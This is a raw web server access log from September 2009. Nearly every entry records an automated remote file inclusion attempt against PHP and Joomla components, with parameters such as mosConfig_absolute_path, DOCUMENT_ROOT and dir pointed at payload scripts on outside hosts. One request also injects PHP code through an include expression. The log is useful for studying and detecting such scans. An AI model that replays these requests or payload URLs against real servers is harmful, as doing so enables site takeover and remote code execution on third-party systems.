58.150.109.161 - - [08/Sep/2009:08:05:58 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
58.150.109.161 - - [08/Sep/2009:08:05:58 -0500] "GET /logs/access_log.1236038400//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
59.150.247.202 - - [08/Sep/2009:08:06:02 -0500] "GET /logs/access_log.1243814400//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.150.247.202 - - [08/Sep/2009:08:06:03 -0500] "GET /logs/access_log.1244505600//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
58.150.109.161 - - [08/Sep/2009:08:07:40 -0500] "GET /logs/access_log.1228608000//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
58.150.109.161 - - [08/Sep/2009:08:07:40 -0500] "GET /logs/access_log.1230508800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://sportsedu.net/zboard/data/writeskill/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
206.225.23.4 - - [08/Sep/2009:08:10:34 -0500] "GET //e404.php?DOCUMENT_ROOT=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
206.225.23.4 - - [08/Sep/2009:08:10:34 -0500] "GET /logs/access_log.1233619200//e404.php?DOCUMENT_ROOT=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
206.225.23.4 - - [08/Sep/2009:08:10:34 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:08:10:57 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:08:10:57 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:08:10:57 -0500] "GET /logs/access_log.1247184000//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:08:11:07 -0500] "GET /logs/access_log.1247356800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:08:13:39 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:08:13:39 -0500] "GET /logs/access_log.1236211200//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:08:13:39 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
61.100.5.136 - - [08/Sep/2009:08:15:13 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
61.100.5.136 - - [08/Sep/2009:08:15:13 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
61.100.5.136 - - [08/Sep/2009:08:15:13 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:08:15:20 -0500] "GET //include/write.php?dir=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:08:15:20 -0500] "GET /logs/access_log.1244764800//include/write.php?dir=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:08:15:20 -0500] "GET /logs//include/write.php?dir=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
222.122.72.216 - - [08/Sep/2009:08:17:42 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.122.72.216 - - [08/Sep/2009:08:17:42 -0500] "GET /logs/access_log.1236211200/modules/Neos_Chronos/header.php?base_folder=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
222.122.72.216 - - [08/Sep/2009:08:17:42 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
61.100.5.136 - - [08/Sep/2009:08:17:53 -0500] "GET /logs/access_log.1239667200//s_loadenv.inc.php?DOCUMENT_ROOT=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.122.72.216 - - [08/Sep/2009:08:17:59 -0500] "GET /logs/access_log.1237075200/modules/Neos_Chronos/header.php?base_folder=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
222.122.72.216 - - [08/Sep/2009:08:17:59 -0500] "GET /logs/access_log.1236038400/modules/Neos_Chronos/header.php?base_folder=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
222.122.72.216 - - [08/Sep/2009:08:18:24 -0500] "GET /logs/access_log.1244764800/modules/Neos_Chronos/header.php?base_folder=http://www.tabakoff.ru//dimti/AinuLid1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:08:18:45 -0500] "GET /logs/access_log.1244764800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:08:19:31 -0500] "GET //errors.php?error=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:08:19:31 -0500] "GET /logs//errors.php?error=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
66.90.115.6 - - [08/Sep/2009:08:19:31 -0500] "GET /logs/access_log.1225238400//errors.php?error=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.239.157.203 - - [08/Sep/2009:08:19:48 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.mabuhayradio.com/components/com_agora/img/members/0/1.jpg? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.239.157.203 - - [08/Sep/2009:08:19:48 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.mabuhayradio.com/components/com_agora/img/members/0/1.jpg? HTTP/1.1" 404 333 "-""Mozilla/5.0"
211.239.157.203 - - [08/Sep/2009:08:19:49 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.mabuhayradio.com/components/com_agora/img/members/0/1.jpg? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.239.157.203 - - [08/Sep/2009:08:20:31 -0500] "GET /logs/access_log.1230076800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.mabuhayradio.com/components/com_agora/img/members/0/1.jpg? HTTP/1.1" 404 360 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:08:21:36 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 376 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:08:21:36 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 349 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:08:21:36 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 354 "-""Mozilla/5.0"
91.191.173.120 - - [08/Sep/2009:08:23:25 -0500] "GET /logs/access_log.1248048000//bbs//skin/ggambo7002_board/write.php?dir=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
91.191.173.120 - - [08/Sep/2009:08:23:25 -0500] "GET /logs/access_log.1247356800//bbs//skin/ggambo7002_board/write.php?dir=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
91.191.173.120 - - [08/Sep/2009:08:23:25 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.191.173.120 - - [08/Sep/2009:08:23:25 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
121.130.29.11 - - [08/Sep/2009:08:29:00 -0500] "GET /skin/happycast_category_lightblack/setup.php?dir=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
121.130.29.11 - - [08/Sep/2009:08:29:00 -0500] "GET /logs/skin/happycast_category_lightblack/setup.php?dir=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.130.29.11 - - [08/Sep/2009:08:29:00 -0500] "GET /logs/access_log.1238716800/skin/happycast_category_lightblack/setup.php?dir=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
121.130.29.11 - - [08/Sep/2009:08:29:00 -0500] "GET /logs/access_log.1238803200/skin/happycast_category_lightblack/setup.php?dir=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
121.78.116.209 - - [08/Sep/2009:08:29:10 -0500] "GET /logs/access_log.1243468800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.78.116.209 - - [08/Sep/2009:08:29:10 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.78.116.209 - - [08/Sep/2009:08:29:10 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.182 - - [08/Sep/2009:08:29:30 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
222.236.47.182 - - [08/Sep/2009:08:29:30 -0500] "GET /logs/access_log.1248048000//bbs//skin/ggambo7002_board/write.php?dir=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [08/Sep/2009:08:29:30 -0500] "GET /logs/access_log.1247356800//bbs//skin/ggambo7002_board/write.php?dir=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [08/Sep/2009:08:29:30 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.sportsedu.net/zboard/data/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.78.116.209 - - [08/Sep/2009:08:29:36 -0500] "GET /logs/access_log.1242086400//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.207.22 - - [08/Sep/2009:08:31:02 -0500] "GET /logs/access_log.1179532800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.90.108.169 - - [08/Sep/2009:08:31:28 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:08:31:28 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:08:31:28 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:08:31:36 -0500] "GET /logs/access_log.1230076800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:08:31:49 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:08:31:49 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
70.90.108.169 - - [08/Sep/2009:08:31:49 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.234.100.46 - - [08/Sep/2009:08:32:03 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 333 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
211.234.100.46 - - [08/Sep/2009:08:32:03 -0500] "GET /logs/access_log.1236211200%22%20target=%22_blank//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 376 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
211.234.100.46 - - [08/Sep/2009:08:32:03 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
70.90.108.169 - - [08/Sep/2009:08:32:03 -0500] "GET /logs/access_log.1230076800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:08:32:48 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:08:32:48 -0500] "GET /logs/access_log.1241827200//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:08:32:48 -0500] "GET /logs/access_log.1245542400//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:08:32:48 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
61.100.5.136 - - [08/Sep/2009:08:33:32 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
61.100.5.136 - - [08/Sep/2009:08:33:32 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
61.100.5.136 - - [08/Sep/2009:08:33:32 -0500] "GET /logs/access_log.1236211200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
110.45.146.223 - - [08/Sep/2009:08:33:43 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
110.45.146.223 - - [08/Sep/2009:08:33:43 -0500] "GET /logs/access_log.1236211200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
110.45.146.223 - - [08/Sep/2009:08:33:43 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:08:34:34 -0500] "GET //skin/zero_vote/error.php?dir=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:08:34:34 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/error.php?dir=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:08:34:35 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
80.67.26.40 - - [08/Sep/2009:08:34:44 -0500] "GET /logs/access_log.1245888000/config.php?path_to_root=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.67.26.40 - - [08/Sep/2009:08:34:44 -0500] "GET /config.php?path_to_root=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
80.67.26.40 - - [08/Sep/2009:08:34:44 -0500] "GET /logs/config.php?path_to_root=http://akbotong.com/akboshop//UserFiles/explorecrew/zfxid.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
110.45.146.223 - - [08/Sep/2009:08:34:58 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
110.45.146.223 - - [08/Sep/2009:08:34:58 -0500] "GET /logs/access_log.1244764800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
110.45.146.223 - - [08/Sep/2009:08:34:58 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
110.45.146.223 - - [08/Sep/2009:08:35:24 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
110.45.146.223 - - [08/Sep/2009:08:35:24 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
110.45.146.223 - - [08/Sep/2009:08:35:24 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
110.45.146.223 - - [08/Sep/2009:08:35:24 -0500] "GET /logs/access_log.1236211200/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
62.140.23.192 - - [08/Sep/2009:08:35:41 -0500] "GET /logs/access_log.1237680000//skin/zero_vote/error.php?dir=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
211.234.100.46 - - [08/Sep/2009:08:35:41 -0500] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
211.234.100.46 - - [08/Sep/2009:08:35:41 -0500] "GET /logs/access_log.1236211200%22%20target=%22_blank//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
211.234.100.46 - - [08/Sep/2009:08:35:41 -0500] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
211.233.69.41 - - [08/Sep/2009:08:36:44 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.233.69.41 - - [08/Sep/2009:08:36:53 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
121.78.116.209 - - [08/Sep/2009:08:38:09 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
121.78.116.209 - - [08/Sep/2009:08:38:09 -0500] "GET /logs/access_log.1230163200//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
121.78.116.209 - - [08/Sep/2009:08:38:09 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
121.78.116.209 - - [08/Sep/2009:08:38:28 -0500] "GET /logs/access_log.1230076800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
211.234.100.46 - - [08/Sep/2009:08:39:17 -0500] "GET /logs/access_log.1237075200%22%20target=%22_blank//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://vacancesgrandbornand.com/id1.php? HTTP/1.1" 404 336 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
218.38.136.251 - - [08/Sep/2009:08:39:59 -0500] "GET /logs/access_log.1246233600//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:08:39:59 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.136.251 - - [08/Sep/2009:08:39:59 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.55.106.228 - - [08/Sep/2009:08:40:04 -0500] "GET /logs/access_log.1106697600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.43.206.217 - - [08/Sep/2009:08:41:24 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:08:41:24 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:08:41:24 -0500] "GET /logs/access_log.1240185600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:08:41:24 -0500] "GET /logs/access_log.1246320000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:08:41:28 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:08:41:28 -0500] "GET /logs/access_log.1240185600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:08:41:28 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.43.206.217 - - [08/Sep/2009:08:41:28 -0500] "GET /logs/access_log.1246320000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.169.210.130 - - [08/Sep/2009:08:41:49 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.76"
218.38.136.251 - - [08/Sep/2009:08:42:09 -0500] "GET /logs/access_log.1242691200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.148.68.101 - - [08/Sep/2009:08:43:46 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
66.148.68.101 - - [08/Sep/2009:08:43:46 -0500] "GET /logs/access_log.1246924800////?_SERVER[DOCUMENT_ROOT]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
66.148.68.101 - - [08/Sep/2009:08:43:47 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 200 204204 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:08:45:08 -0500] "GET /logs/access_log.1236038400/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
114.4.8.14 - - [08/Sep/2009:08:45:08 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
